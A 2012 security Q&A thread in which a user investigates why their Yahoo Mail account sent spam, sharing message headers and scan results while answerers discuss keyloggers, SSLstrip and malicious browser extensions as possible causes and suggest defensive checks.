13

My yahoo email account was sending spams at about 6:42pm EDT (the spams show 3:42pm PDT) yesterday. I realized it by receiving several "Failure Notice" emails for Yahoo was unable to deliver the spam messages to some of the intended addresses.

As much as I would like to know how to prevent such thing from happening, I would like to understand how the spam emails were possibly sent from my email account? Is it possible that someone else accessed my account to use it to send spams?

  1. Suppose they didn't actually log into and send emails from my account,

    • I wonder how the spams were also stored in my "Sent" folder?

    • I also checked "Recent Login Activity" of my yahoo account, but all recorded locations and IP addresses from 4:47 PM the day before yesterday till late yesterday night are my own. I wonder how it is possible that someone else accessed my account to use it to send spams?

  2. Suppose they did actually log into and send spams from my account.

    I wonder how they could possibly manage it, given that I had taken the following steps before the spamming happened?

    • My original password (p+N4th@y8yUcer4pr6HeyE2ewa2Ebu!e) was really long, 32 characters with capital and little letters, numbers and other types of characters, generated by some online random password generator. Also I haven't shared my password with any other website or person. Is such a password possible to guess?

    • My OS has already been Ubuntu 12.04.

      My browser has been Firefox 13.0. There are some installed Firefox Extensions (Brief, DownloadHelper, DownThemAll!, FlashGot, Global Menu Bar integration, Google Translator, Greasemonkey, Mason, Session Manager, Ubuntu Firefox Modifications), Plugins (Adobe Reader, DivX Web Player, Google Talk Plugin, Google Talk Plugin Video Accelerator, iTunes Application Detector, QuickTime Plug-in, Shockwave Flash, VLC Multimedia login, Windows Media Player Plug-in), and user scripts (Google Book Downloader, Google Search -Remove Redirection, Scrub Google Redirect Links).

      I also used ClamTK to scan my home partition for virus and found none.

    • I sometimes opened spam emails, but never clicked hidden or non-hidden links in it.

    • Added: I just run rkhunter on my Ubuntu. The outputs of ./rkhunter -C is here and the output of ./rkhunter -c is here. They look fine, do they?

    • Added: Also I pasted each of the following two headers into geobytes spam locator, and found the sources of the spam emails are both from the same IP 187.41.82.250 in a different country (Brazil) from mine (USA). Does it mean the spams were actually not sent from my email account?

Header of one spam saved in my "Sent" folder

From Tim Thu Jun 14 15:42:07 2012
X-YMail-OSG: ivy79oIVM1k8kPIPgi4nfJh2JPdWcnzc7If0UmOfBQtmnkB
 nEmfLnPHJ
Received: from [187.41.82.250] by web162602.mail.bf1.yahoo.com via HTTP; Thu, 14 Jun 2012 15:42:07 PDT
X-Mailer: YahooMailWebService/0.8.118.349524
Message-ID: <1339713727.16968.BPMail_high_noncarrier@web162602.mail.bf1.yahoo.com>
Date: Thu, 14 Jun 2012 15:42:07 -0700 (PDT)
From: Tim <tim@yahoo.com>
Subject: HI
To: bankofamerica@replies.em.bankofamerica.com
Bcc: xxx@hotmail.com, xxx@yahoo.com, 
    xxx@gmail.com, 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 71

Yahoo notice of failure to deliver the spam to some intended address

Sorry, we were unable to deliver your message to the following address.

<bankofamerica@replies.em.bankofamerica.com>:
Remote host said: 550 5.1.1 <bankofamerica@replies.em.bankofamerica.com> User unknown; rejecting [RCPT_TO]

--- Below this line is a copy of the message.

Received: from [98.139.212.148] by nm21.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [98.139.212.214] by tm5.bullet.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
Received: from [127.0.0.1] by omp1023.mail.bf1.yahoo.com with NNFMP; 14 Jun 2012 22:42:08 -0000
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 395299.5507.bm@omp1023.mail.bf1.yahoo.com
Received: (qmail 91992 invoked by uid 60001); 14 Jun 2012 22:42:08 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1339713728; bh=3k5IzdOBwo7Jx0VjjcU11ALbzymfvrJ2SheLqHngG7s=; h=X-YMail-OSG:Received:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type; b=mk5ksTksAaA1u+2GJaaQoJaClM5AQeOmUn4A9e3xYyJVpER/mKvPB6e5NJlZ2WG1zhOvnrMUHGgqwxMMa7lf3K9tHzGxhbLddTxfM0udgCC2Ws4d7ebgACo2lT/92A9qGxxPIXQCSAEiK8/C7P5rQ6ZAOGOv5xMHuSMY3lUzs9Y=
DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type;
  b=enSetbkOfQmTtzS221NeSMw+dVAbV6y4iFhhSye/tdOobEqExxBebaFrFsehnXbU10/kB00lr3EVDJFCcYoJT5Sp9a7bz1r9L3CezVCrqeolUUNSN4R9qjreJCxk3YxcTnm9f//PvAIPDsqadFmZyDXcT5FyUEfiwb0cyERbL90=;
X-YMail-OSG: ivy79oIVM1k8kPIPgi4nfJh2JPdWcnzc7If0UmOfBQtmnkB
nEmfLnPHJ
Received: from [187.41.82.250] by web162602.mail.bf1.yahoo.com via HTTP; Thu, 14 Jun 2012 15:42:07 PDT
X-Mailer: YahooMailWebService/0.8.118.349524
Message-ID: <1339713727.16968.BPMail_high_noncarrier@web162602.mail.bf1.yahoo.com>
Date: Thu, 14 Jun 2012 15:42:07 -0700 (PDT)
From: Tim <tim@yahoo.com>
Subject: HI
To: bankofamerica@replies.em.bankofamerica.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Scott Pack
  • 15,167
  • 5
  • 61
  • 91
Tim
  • 617
  • 2
  • 7
  • 16
  • Had you ever accessed the account on a Windows machine? The simple answer to this question is they knew your password. Did you have a recover email set to your yahoo email account? If you access your email from a email client they didn't need to know your password since it likely was stored in the program itself. In other words they simply sent the email from your own computer. – Ramhound Jun 15 '12 at 17:26
  • (1) I don't remember what the last time I accessed my account on a Windows machine. If it happened, it would be more than one year ago before my password was reset. (2) I have a different email account set for my Yahoo account. That account doesn't send spams yet. – Tim Jun 15 '12 at 17:36
  • Do you have any browser extensions or plugins installed on FF? – DKNUCKLES Jun 15 '12 at 20:40
  • @DKNUCKLES: What did you suspect? **Extension** (Brief, DownloadHelper, DownThemAll!, FlashGot, Global Menu Bar integration, Google Translator, Greasemonkey, Mason, Session Manager, Ubuntu Firefox Modifications), **Plugin** (Adobe Reader, DivX Web Player, Google Talk Plugin, Google Talk Plugin Video Accelerator, iTunes Aapplication Detector, QuickTime Plug-in, Shockwave Flash, VLC Multimedia lugin, Windows Media Player Plug-in) **User scrip** (Google Book Downloader, Google Search -Remove Redirection, Scrub Google Redirect Links). – Tim Jun 15 '12 at 20:47
  • 3
    Am I correct in that you are not logged in using a mail client? (on Windows it would likely be Outlook, on Ubuntu Evolution, but there are many other apps, including phone apps, and many protocols that they would use, POP3, IMAP, etc. Additionally, if SMTP was used to send mail, it possibly does not count as logging in, as that would be done with POP3 and would be necessary for receiving.) – 700 Software Jun 15 '12 at 21:13
  • Just to be sure, you did you get the spamming to stop by now, right? (I hope you did change your password by now. Is that what stopped it?) – 700 Software Jun 15 '12 at 21:15
  • 2
    @George: (1) I only log into my Yahoo email account using browsers Firefox (rarely Google chrome) on my Ubuntu, not from phones. (2) The spams showed that they were sent at 6:42pm EDT yesterday. I didn't realize them untill about 8pm EDT when I saw the failure notice emails in my "Inbox" sent from yahoo for it was not able to deliever the spams to some addresses and I also saw those sent spams in my "Sent". At that time I changed my password. Since then, I haven't seen any sent emails in my "Sent" or got any email notification in my "Inbox" for not being able to deliver some spams. – Tim Jun 15 '12 at 21:19
  • 2
    Does Yahoo's account activity page show *logins* or does it show the IP addresses of already-logged-in accounts? Could someone have stolen your login cookie and used it on another machine? Have you ever used this machine at, for example, a coffee shop? Did you have your Yahoo e-mail configured on a mobile device? – mpontillo Jun 20 '12 at 20:41
  • Also check your recent login activity in your Yahoo Account. I had the same problem on my Mac Pro. I started being paranoid about my Mac security. Today I've got another SPAM sent from yahoo YahooMailWebService x-mailer. Email is still in Sent folder, no sign of login through the yahoo front end though. –  Jun 20 '12 at 19:58
  • 2
    Did you contact Yahoo? In my case, they just sent a bunch of links to their FAQ of how to fight spams. Really unhelpful. – Tim Jun 20 '12 at 20:11
  • I agree. They are (as a service support) not so helpful. But this login activity helped me to move my investigation on different level. One thing more. After previous spam attack from my account, I have deleted (moving first to another app) almost all addresses from my Yahoo address book. Todays attack was limited what left there. Weird. Looks like Yahoo API or more likely Firefox with some suspicious addons was used, also IP addresses of attacker from "FROM" field: –  Jun 20 '12 at 20:35
  • 93.86.122.164 (Serbia), 211.25.227.106 twice (Malaysia), 190.188.49.243 today (Argentina) –  Jun 20 '12 at 20:43
  • In my case, after I changed my password, there haven't been any spams sent out yet. I haven't deleted my contacts. – Tim Jun 20 '12 at 21:11

2 Answers2

5

There are a variety of ways in which someone can access your account, but in your instance I would say it looks as though you've either got a keylogger or a machine, a rootkit on your machine, or a dirty computer on your network that is sniffing the traffic (potentially stripping the SSL).

The reason I say this is because your password is so long and complex it's highly unlikely that it was guessed by someone and even less likely it was brute forced. The fact the last login IP on the account was your own also indicates that the account was logged into on your network would further my suspicion of a root kit or malicious back door.

Try running rkhunter on your machine and see if anything pops up. Aside from that I would check other machines on your network for bugs as well. In the meantime though, change your password on your Yahoo account to prevent further spam.

DKNUCKLES
  • 9,237
  • 2
  • 37
  • 47
  • Thanks! (1) By "potentially stripping the SSL", do you mean when I was accessing my email account, the dirty machine intercepted my traffic and analyzed it to figure out my account's password? (2) I was also accessing my gmail account at the same time and more often so. It has a much shorter password with little letter and number only. I wonder why that wasn't hacked first? – Tim Jun 15 '12 at 18:13
  • Yes that's exactly what I'm saying. SSL Strip is a MITM attack whereby the user can intercept your SSL traffic and harvest your credentials - More info : http://www.securitytube.net/video/157 – DKNUCKLES Jun 15 '12 at 18:18
  • Thanks! (1) I just run rkhunter on my Ubuntu. The outputs of `./rkhunter -C` is [here](http://pastebin.com/gq123F9z) and the output of `./rkhunter -c` is [here](http://pastebin.com/gQmDvxrJ). They look fine, do they? (2) Also I am not able to check others' computers in the same network. Besides changing my password, is there other way to protect myself more? For example, to secure more my traffic? Does installing a firefwall help? – Tim Jun 15 '12 at 19:34
  • (3) Also I pasted the two headers into [spam locator](http://www.geobytes.com/spamlocator.htm?GetLocation#MessagePath), and found the sources of the spam emails are from a different country (Brazil) from mine (USA). Does it mean the spams were actually not sent from my email account? – Tim Jun 15 '12 at 19:34
  • That is quite bizarre, however if the e-mails are listed in your Sent items as you describe then it would have had to have been sent from your Yahoo server with your credentials. It's odd though that it's from a Brazilian IP address, when if the traffic was coming from your network (which the Yahoo logs claim) the attacker would have likely used an American server as that's where you reside... – DKNUCKLES Jun 15 '12 at 20:18
  • Thanks! How about (1) the outputs of rkhunter and (2) ways to protect my system? – Tim Jun 15 '12 at 20:32
  • The output of rkhunter looks okay to me (although admittedly I'm no expert) and there are reports that SSL Strip can be mitigated by forcing HTTPS connections, or perhaps passing all traffic through an encrypted VPN. – DKNUCKLES Jun 15 '12 at 20:40
  • Yes, I was using a VPN this afternoon. Which line shows the "reports"? – Tim Jun 15 '12 at 20:42
  • starting at 1703 – DKNUCKLES Jun 15 '12 at 20:44
  • I meant which line shows the "reports that SSL Strip can be mitigated by forcing HTTPS connections, or perhaps passing all traffic through an encrypted VPN", not the summary at the end. – Tim Jun 15 '12 at 20:59
4

Looking at the emails, the line

X-Mailer: YahooMailWebService/0.8.118.349524

sticks out as possibly important. That is it seems that they did not use a regular login into webmail but are using Yahoo's Mail Web Service API to access your account (that is you gave an third party application an OAuth token to access your account). Have you granted any applications (e.g., iOS/android app on a mobile device) or a website any sort of access to your email account?

I don't use yahoo mail regularly (have an account only for fantasy sports) and would like to check that you never see that line in your normally sent emails (e.g., when you use webmail). I'd check your Account Settings (Manage Apps and Website Connections - I think is the correct setting), and check that you haven't granted any websites/applications third-party access to your account (including the ability to send mail). (Apparently this is normal headers for sending webmail from Yahoo.)

Check that you don't have any malicious browser extensions installed on your web browser (the kind that have access to all your information and conceivably could steal login information).

Due to the high number of firefox user-scripts/plugins/extensions you are using, one of them may easily be stealing your password. Basically, a browser extension/user script that you install can do anything to any webpage if the extension has permission to load on that page. Read session cookies, see what text is typed in password fields, and even send information back to attacker-controlled servers, etc. Find your extension (~/.mozilla/firefox/[random chars].default/extensions/) and user script directory and try looking through the source code for suspicious behavior from lesser known sources. *.xpi are just zip files; open them up (and any included jar -also just a zip) and browse source. Search for things like password/passwd/yahoo in application that should have nothing to do with logging into applications.

dr jimbob
  • 38,768
  • 8
  • 92
  • 161
  • Thanks! (1) "Have you granted any applications (e.g., iOS/android app on a mobile device) or a website any sort of access to your email account?" No. (2) My Firefox extensions, plugin and user scripts are listed in my comment above. – Tim Jun 15 '12 at 21:05
  • Have you gone to your yahoo account settings and double checked that "Manage Apps and Website Connections" doesn't have anything suspect listed? Also that's a lot of extensions; its fairly easy to write malicious javascript http://security.stackexchange.com/questions/5875/what-are-the-security-implications-of-people-downloading-plugins-wrongly-thinki http://security.stackexchange.com/questions/15259/worst-case-scenario-what-can-a-chrome-extension-do-with-your-data-on-all-websi – dr jimbob Jun 15 '12 at 21:06
  • The only things listed under "Manage Apps and Website Connections" are the stackexchange sites. Shall I remove them? – Tim Jun 15 '12 at 21:14
  • Hmm. So I just signed up for yahoo mail and it seems it does report your computer's IP address used when accessing webmail and says `Received: from [123.123.123.123] by web122504.mail.ne1.yahoo.com via HTTP; Fri, 15 Jun 2012 14:14:35 PDT` `X-Mailer: YahooMailWebService/0.8.118.349524`. Interesting as gmail does not publicly give your IP address out when you login via webmail (but will list it when you use SMTP from say a email client to send). – dr jimbob Jun 15 '12 at 21:21
  • (1) Forgot to mention: I only log into my Yahoo email account using browsers Firefox (rarely Google chrome) on my Ubuntu, not from phones. (2) So I guess "YahooMailWebService/0.8.118.349524" means the API, and what does "X-Mailer" mean? – Tim Jun 15 '12 at 21:23
  • X-Mailer, means the application that mails it. But yahoo adds that `X-Mailer: YahooMailWebService` header for all messages; I had searched for yahoo mail web service and the first thing that came up was its API, so I thought I may have been on to something; but apparently not. – dr jimbob Jun 15 '12 at 21:55